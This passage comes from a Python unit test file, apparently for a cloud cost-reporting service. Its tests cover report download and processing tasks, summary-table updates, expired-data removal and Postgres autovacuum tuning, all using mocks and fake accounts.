billing_source=self.fake.word(),
report_context={},
)
self.assertIsInstance(report, list)
self.assertGreater(len(report), 0)
@patch("masu.processor._tasks.download.ReportDownloader", return_value=FakeDownloader)
def test_disk_status_logging(self, fake_downloader):
"""Test task for logging when temp directory exists."""
logging.disable(logging.NOTSET)
os.makedirs(Config.TMP_DIR, exist_ok=True)
account = fake_arn(service="iam", generate_account_id=True)
expected = "Available disk space"
with self.assertLogs("masu.processor._tasks.download", level="INFO") as logger:
_get_report_files(
Mock(),
customer_name=self.fake.word(),
authentication=account,
provider_type=Provider.PROVIDER_AWS,
report_month=DateHelper().today,
provider_uuid=self.aws_provider_uuid,
billing_source=self.fake.word(),
report_context={},
)
statement_found = any(expected in log for log in logger.output)
self.assertTrue(statement_found)
shutil.rmtree(Config.TMP_DIR, ignore_errors=True)
@patch("masu.processor._tasks.download.ReportDownloader", return_value=FakeDownloader)
def test_disk_status_logging_no_dir(self, fake_downloader):
"""Test task for logging when temp directory does not exist."""
logging.disable(logging.NOTSET)
Config.PVC_DIR = "/this/path/does/not/exist"
account = fake_arn(service="iam", generate_account_id=True)
expected = "Unable to find" + f" available disk space. {Config.PVC_DIR} does not exist"
with self.assertLogs("masu.processor._tasks.download", level="INFO") as logger:
_get_report_files(
Mock(),
customer_name=self.fake.word(),
authentication=account,
provider_type=Provider.PROVIDER_AWS,
report_month=DateHelper().today,
provider_uuid=self.aws_provider_uuid,
billing_source=self.fake.word(),
report_context={},
)
statement_found = any(expected in log for log in logger.output)
self.assertTrue(statement_found)
@patch("masu.processor.worker_cache.CELERY_INSPECT")
@patch("masu.processor._tasks.download.ReportDownloader._set_downloader", side_effect=Exception("only a test"))
def test_get_report_task_exception(self, fake_downloader, mock_inspect):
"""Test task."""
account = fake_arn(service="iam", generate_account_id=True)
with self.assertRaises(Exception):
_get_report_files(
Mock(),
customer_name=self.fake.word(),
authentication=account,
provider_type=Provider.PROVIDER_AWS,
report_month=DateHelper().today,
provider_uuid=uuid4(),
billing_source=self.fake.word(),
report_context={},
)
class ProcessReportFileTests(MasuTestCase):
"""Test Cases for the Orchestrator object."""
@patch("masu.processor._tasks.process.ProviderDBAccessor")
@patch("masu.processor._tasks.process.ReportProcessor")
@patch("masu.processor._tasks.process.ReportStatsDBAccessor")
@patch("masu.processor._tasks.process.ReportManifestDBAccessor")
def test_process_file_initial_ingest(
self, mock_manifest_accessor, mock_stats_accessor, mock_processor, mock_provider_accessor
):
"""Test the process_report_file functionality on initial ingest."""
report_dir = tempfile.mkdtemp()
path = "{}/{}".format(report_dir, "file1.csv")
schema_name = self.schema
provider = Provider.PROVIDER_AWS
provider_uuid = self.aws_provider_uuid
report_dict = {
"file": path,
"compression": "gzip",
"start_date": str(DateHelper().today),
"provider_uuid": provider_uuid,
}
mock_proc = mock_processor()
mock_stats_acc = mock_stats_accessor().__enter__()
mock_manifest_acc = mock_manifest_accessor().__enter__()
mock_provider_acc = mock_provider_accessor().__enter__()
mock_provider_acc.get_setup_complete.return_value = False
_process_report_file(schema_name, provider, report_dict)
mock_proc.process.assert_called()
mock_proc.remove_processed_files.assert_not_called()
mock_stats_acc.log_last_started_datetime.assert_called()
mock_stats_acc.log_last_completed_datetime.assert_called()
mock_manifest_acc.mark_manifest_as_updated.assert_called()
mock_provider_acc.setup_complete.assert_called()
shutil.rmtree(report_dir)
@patch("masu.processor._tasks.process.ProviderDBAccessor")
@patch("masu.processor._tasks.process.ReportProcessor")
@patch("masu.processor._tasks.process.ReportStatsDBAccessor")
@patch("masu.processor._tasks.process.ReportManifestDBAccessor")
def test_process_file_non_initial_ingest(
self, mock_manifest_accessor, mock_stats_accessor, mock_processor, mock_provider_accessor
):
"""Test the process_report_file functionality on non-initial ingest."""
report_dir = tempfile.mkdtemp()
path = "{}/{}".format(report_dir, "file1.csv")
schema_name = self.schema
provider = Provider.PROVIDER_AWS
provider_uuid = self.aws_provider_uuid
report_dict = {
"file": path,
"compression": "gzip",
"start_date": str(DateHelper().today),
"provider_uuid": provider_uuid,
}
mock_proc = mock_processor()
mock_stats_acc = mock_stats_accessor().__enter__()
mock_manifest_acc = mock_manifest_accessor().__enter__()
mock_provider_acc = mock_provider_accessor().__enter__()
mock_provider_acc.get_setup_complete.return_value = True
_process_report_file(schema_name, provider, report_dict)
mock_proc.process.assert_called()
mock_proc.remove_processed_files.assert_called()
mock_stats_acc.log_last_started_datetime.assert_called()
mock_stats_acc.log_last_completed_datetime.assert_called()
mock_manifest_acc.mark_manifest_as_updated.assert_called()
mock_provider_acc.setup_complete.assert_called()
shutil.rmtree(report_dir)
@patch("masu.processor._tasks.process.ReportProcessor")
@patch("masu.processor._tasks.process.ReportStatsDBAccessor")
def test_process_file_exception(self, mock_stats_accessor, mock_processor):
"""Test the process_report_file functionality when exception is thrown."""
report_dir = tempfile.mkdtemp()
path = "{}/{}".format(report_dir, "file1.csv")
schema_name = self.schema
provider = Provider.PROVIDER_AWS
provider_uuid = self.aws_provider_uuid
report_dict = {
"file": path,
"compression": "gzip",
"start_date": str(DateHelper().today),
"provider_uuid": provider_uuid,
}
mock_processor.side_effect = ReportProcessorError("mock error")
mock_stats_acc = mock_stats_accessor().__enter__()
with self.assertRaises(ReportProcessorError):
_process_report_file(schema_name, provider, report_dict)
mock_stats_acc.log_last_started_datetime.assert_called()
mock_stats_acc.log_last_completed_datetime.assert_not_called()
shutil.rmtree(report_dir)
@patch("masu.processor._tasks.process.ReportProcessor")
@patch("masu.processor._tasks.process.ReportStatsDBAccessor")
def test_process_file_not_implemented_exception(self, mock_stats_accessor, mock_processor):
"""Test the process_report_file functionality when exception is thrown."""
report_dir = tempfile.mkdtemp()
path = "{}/{}".format(report_dir, "file1.csv")
schema_name = self.schema
provider = Provider.PROVIDER_AWS
provider_uuid = self.aws_provider_uuid
report_dict = {
"file": path,
"compression": "gzip",
"start_date": str(DateHelper().today),
"provider_uuid": provider_uuid,
}
mock_processor.side_effect = NotImplementedError("mock error")
mock_stats_acc = mock_stats_accessor().__enter__()
with self.assertRaises(NotImplementedError):
_process_report_file(schema_name, provider, report_dict)
mock_stats_acc.log_last_started_datetime.assert_called()
mock_stats_acc.log_last_completed_datetime.assert_called()
shutil.rmtree(report_dir)
@patch("masu.processor._tasks.process.ReportProcessor")
@patch("masu.processor._tasks.process.ReportStatsDBAccessor")
@patch("masu.database.report_manifest_db_accessor.ReportManifestDBAccessor")
def test_process_file_missing_manifest(self, mock_manifest_accessor, mock_stats_accessor, mock_processor):
"""Test the process_report_file functionality when manifest is missing."""
mock_manifest_accessor.get_manifest_by_id.return_value = None
report_dir = tempfile.mkdtemp()
path = "{}/{}".format(report_dir, "file1.csv")
schema_name = self.schema
provider = Provider.PROVIDER_AWS
provider_uuid = self.aws_provider_uuid
report_dict = {
"file": path,
"compression": "gzip",
"start_date": str(DateHelper().today),
"provider_uuid": provider_uuid,
}
mock_proc = mock_processor()
mock_stats_acc = mock_stats_accessor().__enter__()
mock_manifest_acc = mock_manifest_accessor().__enter__()
_process_report_file(schema_name, provider, report_dict)
mock_proc.process.assert_called()
mock_stats_acc.log_last_started_datetime.assert_called()
mock_stats_acc.log_last_completed_datetime.assert_called()
mock_manifest_acc.mark_manifest_as_updated.assert_not_called()
shutil.rmtree(report_dir)
@patch("masu.processor.tasks.update_summary_tables")
def test_summarize_reports_empty_list(self, mock_update_summary):
"""Test that the summarize_reports task is called when empty processing list is provided."""
mock_update_summary.delay = Mock()
summarize_reports([])
mock_update_summary.delay.assert_not_called()
@patch("masu.processor.tasks.update_summary_tables")
def test_summarize_reports_processing_list(self, mock_update_summary):
"""Test that the summarize_reports task is called when a processing list is provided."""
mock_update_summary.s = Mock()
report_meta = {}
report_meta["start_date"] = str(DateHelper().today)
report_meta["schema_name"] = self.schema
report_meta["provider_type"] = Provider.PROVIDER_OCP
report_meta["provider_uuid"] = self.ocp_test_provider_uuid
report_meta["manifest_id"] = 1
# add a report with start/end dates specified
report2_meta = {}
report2_meta["start_date"] = str(DateHelper().today)
report2_meta["schema_name"] = self.schema
report2_meta["provider_type"] = Provider.PROVIDER_OCP
report2_meta["provider_uuid"] = self.ocp_test_provider_uuid
report2_meta["manifest_id"] = 2
report2_meta["start"] = str(DateHelper().yesterday)
report2_meta["end"] = str(DateHelper().today)
reports_to_summarize = [report_meta, report2_meta]
summarize_reports(reports_to_summarize)
mock_update_summary.s.assert_called()
@patch("masu.processor.tasks.update_summary_tables")
def test_summarize_reports_processing_list_with_none(self, mock_update_summary):
"""Test that the summarize_reports task is called when a processing list when a None provided."""
mock_update_summary.s = Mock()
report_meta = {}
report_meta["start_date"] = str(DateHelper().today)
report_meta["schema_name"] = self.schema
report_meta["provider_type"] = Provider.PROVIDER_OCP
report_meta["provider_uuid"] = self.ocp_test_provider_uuid
report_meta["manifest_id"] = 1
reports_to_summarize = [report_meta, None]
summarize_reports(reports_to_summarize)
mock_update_summary.s.assert_called()
@patch("masu.processor.tasks.update_summary_tables")
def test_summarize_reports_processing_list_only_none(self, mock_update_summary):
"""Test that the summarize_reports task is called when a processing list with None provided."""
mock_update_summary.s = Mock()
reports_to_summarize = [None, None]
summarize_reports(reports_to_summarize)
mock_update_summary.s.assert_not_called()
class TestProcessorTasks(MasuTestCase):
"""Test cases for Processor Celery tasks."""
@classmethod
def setUpClass(cls):
"""Set up the class."""
super().setUpClass()
cls.fake = faker.Faker()
# cls.fake_reports = [
# {"file": cls.fake.word(), "compression": "GZIP"},
# {"file": cls.fake.word(), "compression": "PLAIN"},
# ]
# cls.fake_account = fake_arn(service="iam", generate_account_id=True)
cls.fake_uuid = "d4703b6e-cd1f-4253-bfd4-32bdeaf24f97"
cls.today = DateHelper().today
cls.yesterday = cls.today - timedelta(days=1)
def setUp(self):
"""Set up shared test variables."""
super().setUp()
self.test_assembly_id = "882083b7-ea62-4aab-aa6a-f0d08d65ee2b"
self.test_etag = "fake_etag"
self.get_report_args = {
"customer_name": self.schema,
"authentication": self.aws_provider.authentication.credentials,
"provider_type": Provider.PROVIDER_AWS_LOCAL,
"schema_name": self.schema,
"billing_source": self.aws_provider.billing_source.data_source,
"provider_uuid": self.aws_provider_uuid,
"report_month": DateHelper().today,
"report_context": {"current_file": f"/my/{self.test_assembly_id}/koku-1.csv.gz"},
}
@patch("masu.processor.tasks.WorkerCache.remove_task_from_cache")
@patch("masu.processor.worker_cache.CELERY_INSPECT")
@patch("masu.processor.tasks._process_report_file")
def test_get_report_files_exception(self, mock_process_files, mock_inspect, mock_cache_remove):
"""Test raising download exception is handled."""
exceptions = [MasuProcessingError, MasuProviderError, ReportDownloaderError]
for exception in exceptions:
with self.subTest(exception=exception):
with patch(
"masu.processor.tasks._get_report_files", side_effect=exception("Mocked exception!")
) as mock_get_files:
get_report_files(**self.get_report_args)
mock_get_files.assert_called()
mock_cache_remove.assert_called()
mock_process_files.assert_not_called()
@patch("masu.processor.tasks.WorkerCache.remove_task_from_cache")
@patch("masu.processor.worker_cache.CELERY_INSPECT")
@patch("masu.processor.tasks._get_report_files")
@patch("masu.processor.tasks._process_report_file", side_effect=ReportProcessorError("Mocked process error!"))
def test_get_report_process_exception(self, mock_process_files, mock_get_files, mock_inspect, mock_cache_remove):
"""Test raising processor exception is handled."""
mock_get_files.return_value = {"file": self.fake.word(), "compression": "GZIP"}
get_report_files(**self.get_report_args)
mock_cache_remove.assert_called()
@patch("masu.processor.tasks.WorkerCache.remove_task_from_cache")
@patch("masu.processor.worker_cache.CELERY_INSPECT")
@patch("masu.processor.tasks._get_report_files")
@patch("masu.processor.tasks._process_report_file", side_effect=NotImplementedError)
def test_get_report_process_not_implemented_error(
self, mock_process_files, mock_get_files, mock_inspect, mock_cache_remove
):
"""Test raising processor exception is handled."""
mock_get_files.return_value = {"file": self.fake.word(), "compression": "PLAIN"}
get_report_files(**self.get_report_args)
mock_cache_remove.assert_called()
@patch("masu.processor.tasks.WorkerCache.remove_task_from_cache")
@patch("masu.processor.worker_cache.CELERY_INSPECT")
@patch("masu.processor.tasks._get_report_files", side_effect=Exception("Mocked download error!"))
def test_get_report_broad_exception(self, mock_get_files, mock_inspect, mock_cache_remove):
"""Test raising download broad exception is handled."""
mock_get_files.return_value = {"file": self.fake.word(), "compression": "GZIP"}
get_report_files(**self.get_report_args)
mock_cache_remove.assert_called()
@patch("masu.processor.tasks.WorkerCache.remove_task_from_cache")
@patch("masu.processor.worker_cache.CELERY_INSPECT")
@patch("masu.processor.tasks._get_report_files", side_effect=ReportDownloaderWarning("Mocked download warning!"))
def test_get_report_download_warning(self, mock_get_files, mock_inspect, mock_cache_remove):
"""Test raising download warning is handled."""
mock_get_files.return_value = {"file": self.fake.word(), "compression": "GZIP"}
get_report_files(**self.get_report_args)
mock_cache_remove.assert_called()
class TestRemoveExpiredDataTasks(MasuTestCase):
"""Test cases for Processor Celery tasks."""
@patch.object(ExpiredDataRemover, "remove")
@patch("masu.processor.tasks.refresh_materialized_views.s")
def test_remove_expired_data(self, fake_view, fake_remover):
"""Test task."""
expected_results = [{"account_payer_id": "999999999", "billing_period_start": "2018-06-24 15:47:33.052509"}]
fake_remover.return_value = expected_results
expected = "INFO:masu.processor._tasks.remove_expired:Expired Data:\n {}"
# disable logging override set in masu/__init__.py
logging.disable(logging.NOTSET)
with self.assertLogs("masu.processor._tasks.remove_expired") as logger:
remove_expired_data(schema_name=self.schema, provider=Provider.PROVIDER_AWS, simulate=True)
self.assertIn(expected.format(str(expected_results)), logger.output)
class TestUpdateSummaryTablesTask(MasuTestCase):
"""Test cases for Processor summary table Celery tasks."""
@classmethod
def setUpClass(cls):
"""Set up for the class."""
super().setUpClass()
cls.aws_tables = list(AWS_CUR_TABLE_MAP.values())
cls.ocp_tables = list(OCP_REPORT_TABLE_MAP.values())
cls.all_tables = list(AWS_CUR_TABLE_MAP.values()) + list(OCP_REPORT_TABLE_MAP.values())
cls.creator = ReportObjectCreator(cls.schema)
def setUp(self):
"""Set up each test."""
super().setUp()
self.aws_accessor = AWSReportDBAccessor(schema=self.schema)
self.ocp_accessor = OCPReportDBAccessor(schema=self.schema)
# Populate some line item data so that the summary tables
# have something to pull from
self.start_date = DateHelper().today.replace(day=1)
@patch("masu.processor.tasks.chain")
@patch("masu.processor.tasks.refresh_materialized_views")
@patch("masu.processor.tasks.update_cost_model_costs")
def test_update_summary_tables_aws(self, mock_charge_info, mock_views, mock_chain):
"""Test that the summary table task runs."""
provider = Provider.PROVIDER_AWS
provider_aws_uuid = self.aws_provider_uuid
daily_table_name = AWS_CUR_TABLE_MAP["line_item_daily"]
summary_table_name = AWS_CUR_TABLE_MAP["line_item_daily_summary"]
start_date = self.start_date.replace(day=1) + relativedelta.relativedelta(months=-1)
with schema_context(self.schema):
daily_query = self.aws_accessor._get_db_obj_query(daily_table_name)
summary_query = self.aws_accessor._get_db_obj_query(summary_table_name)
daily_query.delete()
summary_query.delete()
initial_daily_count = daily_query.count()
initial_summary_count = summary_query.count()
self.assertEqual(initial_daily_count, 0)
self.assertEqual(initial_summary_count, 0)
update_summary_tables(self.schema, provider, provider_aws_uuid, start_date, synchronous=True)
with schema_context(self.schema):
self.assertNotEqual(daily_query.count(), initial_daily_count)
self.assertNotEqual(summary_query.count(), initial_summary_count)
mock_chain.return_value.apply_async.assert_called()
@patch("masu.processor.tasks.chain")
def test_update_summary_tables_aws_end_date(self, mock_charge_info):
"""Test that the summary table task respects a date range."""
provider = Provider.PROVIDER_AWS_LOCAL
provider_aws_uuid = self.aws_provider_uuid
ce_table_name = AWS_CUR_TABLE_MAP["cost_entry"]
daily_table_name = AWS_CUR_TABLE_MAP["line_item_daily"]
summary_table_name = AWS_CUR_TABLE_MAP["line_item_daily_summary"]
start_date = DateHelper().last_month_start
end_date = DateHelper().last_month_end
daily_table = getattr(self.aws_accessor.report_schema, daily_table_name)
summary_table = getattr(self.aws_accessor.report_schema, summary_table_name)
ce_table = getattr(self.aws_accessor.report_schema, ce_table_name)
with schema_context(self.schema):
daily_table.objects.all().delete()
summary_table.objects.all().delete()
ce_start_date = ce_table.objects.filter(interval_start__gte=start_date.date()).aggregate(
Min("interval_start")
)["interval_start__min"]
ce_end_date = ce_table.objects.filter(interval_start__lte=end_date.date()).aggregate(
Max("interval_start")
)["interval_start__max"]
# The summary tables will only include dates where there is data
expected_start_date = max(start_date, ce_start_date)
expected_start_date = expected_start_date.replace(hour=0, minute=0, second=0, microsecond=0)
expected_end_date = min(end_date, ce_end_date)
expected_end_date = expected_end_date.replace(hour=0, minute=0, second=0, microsecond=0)
update_summary_tables(self.schema, provider, provider_aws_uuid, start_date, end_date, synchronous=True)
with schema_context(self.schema):
daily_entry = daily_table.objects.all().aggregate(Min("usage_start"), Max("usage_end"))
result_start_date = daily_entry["usage_start__min"]
result_end_date = daily_entry["usage_end__max"]
self.assertEqual(result_start_date, expected_start_date.date())
self.assertEqual(result_end_date, expected_end_date.date())
with schema_context(self.schema):
summary_entry = summary_table.objects.all().aggregate(Min("usage_start"), Max("usage_end"))
result_start_date = summary_entry["usage_start__min"]
result_end_date = summary_entry["usage_end__max"]
self.assertEqual(result_start_date, expected_start_date.date())
self.assertEqual(result_end_date, expected_end_date.date())
@patch("masu.processor.worker_cache.CELERY_INSPECT")
@patch("masu.processor.tasks.CostModelDBAccessor")
@patch("masu.processor.tasks.chain")
@patch("masu.processor.tasks.refresh_materialized_views")
@patch("masu.processor.tasks.update_cost_model_costs")
@patch("masu.processor.ocp.ocp_cost_model_cost_updater.CostModelDBAccessor")
def test_update_summary_tables_ocp(
self, mock_cost_model, mock_charge_info, mock_view, mock_chain, mock_task_cost_model, mock_cache
):
"""Test that the summary table task runs."""
infrastructure_rates = {
"cpu_core_usage_per_hour": 1.5,
"memory_gb_usage_per_hour": 2.5,
"storage_gb_usage_per_month": 0.5,
}
markup = {}
mock_cost_model.return_value.__enter__.return_value.infrastructure_rates = infrastructure_rates
mock_cost_model.return_value.__enter__.return_value.supplementary_rates = {}
mock_cost_model.return_value.__enter__.return_value.markup = markup
# We need to bypass the None check for cost model in update_cost_model_costs
mock_task_cost_model.return_value.__enter__.return_value.cost_model = {}
provider = Provider.PROVIDER_OCP
provider_ocp_uuid = self.ocp_test_provider_uuid
daily_table_name = OCP_REPORT_TABLE_MAP["line_item_daily"]
start_date = DateHelper().last_month_start
end_date = DateHelper().last_month_end
with schema_context(self.schema):
daily_query = self.ocp_accessor._get_db_obj_query(daily_table_name)
daily_query.delete()
initial_daily_count = daily_query.count()
self.assertEqual(initial_daily_count, 0)
update_summary_tables(self.schema, provider, provider_ocp_uuid, start_date, end_date, synchronous=True)
with schema_context(self.schema):
self.assertNotEqual(daily_query.count(), initial_daily_count)
update_cost_model_costs(
schema_name=self.schema,
provider_uuid=provider_ocp_uuid,
start_date=start_date,
end_date=end_date,
synchronous=True,
)
table_name = OCP_REPORT_TABLE_MAP["line_item_daily_summary"]
with ProviderDBAccessor(provider_ocp_uuid) as provider_accessor:
provider_obj = provider_accessor.get_provider()
usage_period_qry = self.ocp_accessor.get_usage_period_query_by_provider(provider_obj.uuid)
with schema_context(self.schema):
cluster_id = usage_period_qry.first().cluster_id
items = self.ocp_accessor._get_db_obj_query(table_name).filter(
usage_start__gte=start_date,
usage_start__lte=end_date,
cluster_id=cluster_id,
data_source="Pod",
infrastructure_raw_cost__isnull=True,
)
for item in items:
self.assertNotEqual(item.infrastructure_usage_cost.get("cpu"), 0)
self.assertNotEqual(item.infrastructure_usage_cost.get("memory"), 0)
storage_daily_name = OCP_REPORT_TABLE_MAP["storage_line_item_daily"]
items = self.ocp_accessor._get_db_obj_query(storage_daily_name).filter(cluster_id=cluster_id)
for item in items:
self.assertIsNotNone(item.volume_request_storage_byte_seconds)
self.assertIsNotNone(item.persistentvolumeclaim_usage_byte_seconds)
storage_summary_name = OCP_REPORT_TABLE_MAP["line_item_daily_summary"]
items = self.ocp_accessor._get_db_obj_query(storage_summary_name).filter(
cluster_id=cluster_id, data_source="Storage", infrastructure_raw_cost__isnull=True
)
for item in items:
self.assertIsNotNone(item.volume_request_storage_gigabyte_months)
self.assertIsNotNone(item.persistentvolumeclaim_usage_gigabyte_months)
mock_chain.return_value.apply_async.assert_called()
@patch("masu.processor.tasks.chain")
@patch("masu.database.cost_model_db_accessor.CostModelDBAccessor.get_memory_gb_usage_per_hour_rates")
@patch("masu.database.cost_model_db_accessor.CostModelDBAccessor.get_cpu_core_usage_per_hour_rates")
def test_update_summary_tables_ocp_end_date(self, mock_cpu_rate, mock_mem_rate, mock_charge_info):
"""Test that the summary table task respects a date range."""
mock_cpu_rate.return_value = 1.5
mock_mem_rate.return_value = 2.5
provider = Provider.PROVIDER_OCP
provider_ocp_uuid = self.ocp_test_provider_uuid
ce_table_name = OCP_REPORT_TABLE_MAP["report"]
daily_table_name = OCP_REPORT_TABLE_MAP["line_item_daily"]
start_date = DateHelper().last_month_start
end_date = DateHelper().last_month_end
daily_table = getattr(self.ocp_accessor.report_schema, daily_table_name)
ce_table = getattr(self.ocp_accessor.report_schema, ce_table_name)
with schema_context(self.schema):
daily_table.objects.all().delete()
ce_start_date = ce_table.objects.filter(interval_start__gte=start_date.date()).aggregate(
Min("interval_start")
)["interval_start__min"]
ce_end_date = ce_table.objects.filter(interval_start__lte=end_date.date()).aggregate(
Max("interval_start")
)["interval_start__max"]
# The summary tables will only include dates where there is data
expected_start_date = max(start_date, ce_start_date)
expected_end_date = min(end_date, ce_end_date)
update_summary_tables(self.schema, provider, provider_ocp_uuid, start_date, end_date, synchronous=True)
with schema_context(self.schema):
daily_entry = daily_table.objects.all().aggregate(Min("usage_start"), Max("usage_end"))
result_start_date = daily_entry["usage_start__min"]
result_end_date = daily_entry["usage_end__max"]
self.assertEqual(result_start_date, expected_start_date.date())
self.assertEqual(result_end_date, expected_end_date.date())
@patch("masu.processor.tasks.chain")
@patch("masu.processor.tasks.CostModelDBAccessor")
def test_update_summary_tables_remove_expired_data(self, mock_accessor, mock_chain):
provider = Provider.PROVIDER_AWS
provider_aws_uuid = self.aws_provider_uuid
start_date = DateHelper().last_month_start - relativedelta.relativedelta(months=1)
end_date = DateHelper().today
expected_start_date = start_date.strftime("%Y-%m-%d")
expected_end_date = end_date.strftime("%Y-%m-%d")
manifest_id = 1
tracing_id = "1234"
update_summary_tables(
self.schema,
provider,
provider_aws_uuid,
start_date,
end_date,
manifest_id,
tracing_id=tracing_id,
synchronous=True,
)
mock_chain.assert_called_once_with(
update_cost_model_costs.s(
self.schema, provider_aws_uuid, expected_start_date, expected_end_date, tracing_id=tracing_id
).set(queue=UPDATE_COST_MODEL_COSTS_QUEUE)
| refresh_materialized_views.si(
self.schema, provider, provider_uuid=provider_aws_uuid, manifest_id=manifest_id, tracing_id=tracing_id
).set(queue=REFRESH_MATERIALIZED_VIEWS_QUEUE)
)
@patch("masu.processor.tasks.update_summary_tables")
def test_get_report_data_for_all_providers(self, mock_update):
"""Test GET report_data endpoint with provider_uuid=*."""
start_date = date.today()
update_all_summary_tables(start_date)
mock_update.s.assert_called_with(ANY, ANY, ANY, str(start_date), ANY, queue_name=ANY)
@patch("masu.processor.tasks.connection")
def test_vacuum_schema(self, mock_conn):
"""Test that the vacuum schema task runs."""
logging.disable(logging.NOTSET)
mock_conn.cursor.return_value.__enter__.return_value.fetchall.return_value = [("table",)]
expected = "INFO:masu.processor.tasks:VACUUM ANALYZE acct10001.table"
with self.assertLogs("masu.processor.tasks", level="INFO") as logger:
vacuum_schema(self.schema)
self.assertIn(expected, logger.output)
@patch("masu.processor.tasks.connection")
def test_autovacuum_tune_schema_default_table(self, mock_conn):
"""Test that the autovacuum tuning runs."""
logging.disable(logging.NOTSET)
# Make sure that the AUTOVACUUM_TUNING environment variable is unset!
if "AUTOVACUUM_TUNING" in os.environ:
del os.environ["AUTOVACUUM_TUNING"]
mock_conn.cursor.return_value.__enter__.return_value.fetchall.return_value = [("cost_model", 20000000, {})]
expected = (
"INFO:masu.processor.tasks:ALTER TABLE acct10001.cost_model set (autovacuum_vacuum_scale_factor = 0.01);"
)
with self.assertLogs("masu.processor.tasks", level="INFO") as logger:
autovacuum_tune_schema(self.schema)
self.assertIn(expected, logger.output)
mock_conn.cursor.return_value.__enter__.return_value.fetchall.return_value = [("cost_model", 2000000, {})]
expected = (
"INFO:masu.processor.tasks:ALTER TABLE acct10001.cost_model set (autovacuum_vacuum_scale_factor = 0.02);"
)
with self.assertLogs("masu.processor.tasks", level="INFO") as logger:
autovacuum_tune_schema(self.schema)
self.assertIn(expected, logger.output)
mock_conn.cursor.return_value.__enter__.return_value.fetchall.return_value = [("cost_model", 200000, {})]
expected = (
"INFO:masu.processor.tasks:ALTER TABLE acct10001.cost_model set (autovacuum_vacuum_scale_factor = 0.05);"
)
with self.assertLogs("masu.processor.tasks", level="INFO") as logger:
autovacuum_tune_schema(self.schema)
self.assertIn(expected, logger.output)
mock_conn.cursor.return_value.__enter__.return_value.fetchall.return_value = [
("cost_model", 200000, {"autovacuum_vacuum_scale_factor": Decimal("0.05")})
]
expected = "INFO:masu.processor.tasks:Altered autovacuum_vacuum_scale_factor on 0 tables"
with self.assertLogs("masu.processor.tasks", level="INFO") as logger:
autovacuum_tune_schema(self.schema)
self.assertIn(expected, logger.output)
mock_conn.cursor.return_value.__enter__.return_value.fetchall.return_value = [
("cost_model", 20000, {"autovacuum_vacuum_scale_factor": Decimal("0.02")})
]
expected = "INFO:masu.processor.tasks:ALTER TABLE acct10001.cost_model reset (autovacuum_vacuum_scale_factor);"
with self.assertLogs("masu.processor.tasks", level="INFO") as logger:
autovacuum_tune_schema(self.schema)
self.assertIn(expected, logger.output)
@patch("masu.processor.tasks.connection")
def test_autovacuum_tune_schema_custom_table(self, mock_conn):
"""Test that the autovacuum tuning runs."""
logging.disable(logging.NOTSET)
scale_table = [(10000000, "0.0001"), (1000000, "0.004"), (100000, "0.011")]
os.environ["AUTOVACUUM_TUNING"] = json.dumps(scale_table)
mock_conn.cursor.return_value.__enter__.return_value.fetchall.return_value = [("cost_model", 20000000, {})]
expected = (
"INFO:masu.processor.tasks:ALTER TABLE acct10001.cost_model set (autovacuum_vacuum_scale_factor = 0.0001);"
)
with self.assertLogs("masu.processor.tasks", level="INFO") as logger:
autovacuum_tune_schema(self.schema)
self.assertIn(expected, logger.output)
mock_conn.cursor.return_value.__enter__.return_value.fetchall.return_value = [("cost_model", 2000000, {})]
expected = (
"INFO:masu.processor.tasks:ALTER TABLE acct10001.cost_model set (autovacuum_vacuum_scale_factor = 0.004);"
)
with self.assertLogs("masu.processor.tasks", level="INFO") as logger:
autovacuum_tune_schema(self.schema)
self.assertIn(expected, logger.output)
mock_conn.cursor.return_value.__enter__.return_value.fetchall.return_value = [("cost_model", 200000, {})]
expected = (
"INFO:masu.processor.tasks:ALTER TABLE acct10001.cost_model set (autovacuum_vacuum_scale_factor = 0.011);"
)
with self.assertLogs("masu.processor.tasks", level="INFO") as logger:
autovacuum_tune_schema(self.schema)
self.assertIn(expected, logger.output)
mock_conn.cursor.return_value.__enter__.return_value.fetchall.return_value = [
("cost_model", 200000, {"autovacuum_vacuum_scale_factor": Decimal("0.011")})
]
expected = "INFO:masu.processor.tasks:Altered autovacuum_vacuum_scale_factor on 0 tables"
with self.assertLogs("masu.processor.tasks", level="INFO") as logger:
autovacuum_tune_schema(self.schema)
self.assertIn(expected, logger.output)
mock_conn.cursor.return_value.__enter__.return_value.fetchall.return_value = [
("cost_model", 20000, {"autovacuum_vacuum_scale_factor": Decimal("0.004")})
]
expected = "INFO:masu.processor.tasks:ALTER TABLE acct10001.cost_model reset (autovacuum_vacuum_scale_factor);"
with self.assertLogs("masu.processor.tasks", level="INFO") as logger:
autovacuum_tune_schema(self.schema)
self.assertIn(expected, logger.output)
del os.environ["AUTOVACUUM_TUNING"]
@patch("masu.processor.tasks.connection")
def test_autovacuum_tune_schema_manual_setting(self, mock_conn):
"""Test that the autovacuum tuning runs."""
logging.disable(logging.NOTSET)
# Make sure that the AUTOVACUUM_TUNING environment variable is unset!
if "AUTOVACUUM_TUNING" in os.environ:
del os.environ["AUTOVACUUM_TUNING"]
mock_conn.cursor.return_value.__enter__.return_value.fetchall.return_value = [
("cost_model", 200000, {"autovacuum_vacuum_scale_factor": Decimal("0.04")})
]
expected = "INFO:masu.processor.tasks:Altered autovacuum_vacuum_scale_factor on 0 tables"
with self.assertLogs("masu.processor.tasks", level="INFO") as logger:
autovacuum_tune_schema(self.schema)
self.assertIn(expected, logger.output)
mock_conn.cursor.return_value.__enter__.return_value.fetchall.return_value = [
("cost_model", 200000, {"autovacuum_vacuum_scale_factor": Decimal("0.06")})
]
expected = (
"INFO:masu.processor.tasks:ALTER TABLE acct10001.cost_model set (autovacuum_vacuum_scale_factor = 0.05);"
)
with self.assertLogs("masu.processor.tasks", level="INFO") as logger:
autovacuum_tune_schema(self.schema)
self.assertIn(expected, logger.output)
@patch("masu.processor.tasks.connection")
def test_autovacuum_tune_schema_invalid_setting(self, mock_conn):
"""Test that the autovacuum tuning runs."""
logging.disable(logging.NOTSET)
# Make sure that the AUTOVACUUM_TUNING environment variable is unset!
if "AUTOVACUUM_TUNING" in os.environ:
del os.environ["AUTOVACUUM_TUNING"]
# This invalid setting should be treated as though there was no setting
mock_conn.cursor.return_value.__enter__.return_value.fetchall.return_value = [
("cost_model", 20000000, {"autovacuum_vacuum_scale_factor": ""})
]
expected = (
"INFO:masu.processor.tasks:ALTER TABLE acct10001.cost_model set (autovacuum_vacuum_scale_factor = 0.01);"
)
with self.assertLogs("masu.processor.tasks", level="INFO") as logger:
autovacuum_tune_schema(self.schema)
self.assertIn(expected, logger.output)
def test_autovacuum_tune_schema_normalize(self):
"""Test that the autovacuum tuning runs."""
test_matrix = [
{"table_options": None, "expected": {}},
